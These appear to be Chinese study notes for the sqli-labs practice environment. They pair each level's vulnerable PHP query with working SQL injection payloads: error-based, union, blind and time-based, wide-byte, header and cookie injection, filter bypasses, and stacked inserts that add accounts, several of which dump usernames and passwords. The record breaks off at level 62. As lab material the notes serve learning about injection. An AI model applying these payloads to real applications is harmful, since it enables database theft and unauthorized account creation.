sqli-less 筆記
一 '
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23
二 數值
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23
三 ')
?id=1'。
?id=1') and 1=1%23
?id=1') and 1=2%23
四 ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23
五 ' 報錯
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23
六 " 報錯
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23
七 ')) 盲注
1')) and length(database())=8 %23 //求資料庫的長度
1')) and ascii(substr(database(),1,1))=115%23 //求資料庫名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23 //求表的數量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 //求表名的ascii碼值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23 //求列的數量
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23 //求列名的ascii碼值
1')) and (select count(username) from security.users)=13 %23 //求欄位的內容
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23 //求欄位的ascii碼值
八 ' 盲注
(參考七)
九 ' 時間型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23
十 " 時間型盲注
(參考九)
十一 '報錯
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username輸入:admin
password輸入:admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#
十二 ")報錯
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username輸入:admin
password輸入:1") and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)
十三 ')報錯
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username輸入:admin
password輸入:admin') and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)
十四 "報錯
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username輸入:admin
password輸入:admin" and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)
十五 '(布林型、時間)盲注
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1;
username輸入:admin
password輸入:admin' and sleep(if(length(database())>10,0,5))#
十六 "(布林型、時間)盲注
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1;
username輸入:admin
password輸入:admin") and sleep(if(length(database())>10,0,5))#
十七 報錯
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
username admin
password admin' or updatexml(1,concat(0x7e,(database())),0) or '1
十八 User-Agent報錯 burp攔截
username admin
password admin
$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent後加 1' or updatexml(1,concat(0x7e,(database())),0) or '
十九 referer報錯 burp攔截
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer後加 1' or updatexml(1,concat(0x7e,(database())),0) or '
二十 ' burp攔截 聯合查詢
第一步:用某一個賬號aaa登入成功
第二步:重新整理頁面,用burp攔截,修改cookie欄位
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa後輸入 ' order by 3%23
在uname=aaa後輸入 ' and 1=2 union select 1,2,3%23
在uname=aaa後輸入 ' and 1=2 union select 1,database(),3%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa後輸入 ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
二十一 ') burp攔截 聯合查詢
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
與二十題基本相似,不同的是,閉合條件為單引號加括號,cookie中uname編碼為base64
uname=aaa') order by 3# -> uname=YWEnKSBvcmRlciBieSAzIw==
uname=aaa') and 1=2 union select 1,2,3# -> uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()# -> uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
(參考二十)
二十二 " burp攔截 聯合查詢
$cookee = $_C
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
與二十一題基本相似,不同的是,閉合條件為雙引號
(參考二十一)
二十三 ' 聯合查詢
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1
二十四
使用者註冊login_create.php
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";、
username輸入:admin'#
password隨意
使用者登入login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
密碼修改pass_change.php
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次排序注入
二十五 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1
二十五a 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=1 oorr updatexml(1,concat(0x23,database()),1) %23 LIMIT 0,1";
1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23
二十六 聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1
二十六a聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1
二十七
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1
二十七a
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1
二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1
二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces.
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1
二十九
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十一
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十二 寬位元組注入
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);
$string = preg_replace('/\'/i', '\\\'', $string);
$string = preg_replace('/\"/', "\\\"", $string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十三
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十四 聯合 burp攔截
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(admin)
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23
三十五
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十六 MYSQL檔案裡面的my.ini裡面的gbk改為Latin1
$id=check_quotes($_GET['id']);
function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十七 burp攔截
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23
三十八 ' 基於聯合查詢的堆疊注入
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23
三十九 數值
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)
四十 ')
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)
四十一
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)
四十二 堆疊注入 報錯
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
賬號隨意
密碼 a';create table W like users# //新增表
密碼 a';insert into users values(20,'xj','xj123')# //新增賬號密碼
登入進去修改密碼
四十三
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上
四十四
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上
四十五
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上
四十六 報錯
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc,顯示結果不同,表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 顯示不完全
四十七
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 顯示不完全
四十八 錯誤不回顯 時間盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
四十九 錯誤不回顯 時間盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十 時間盲注 堆疊注入(參考上面)
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
五十一 時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十二 時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
五十三 時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十四
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY
五十五
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn
五十六
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6
五十七
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs
五十八
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO
五十九
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7
')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg
六十
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2
六十一
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x
')),1)%23
//id,sessid,secret_NSKU,tryy
1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
//8EhMs3hgKrmAcsmlJn4wVrSh
六十二 盲注
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
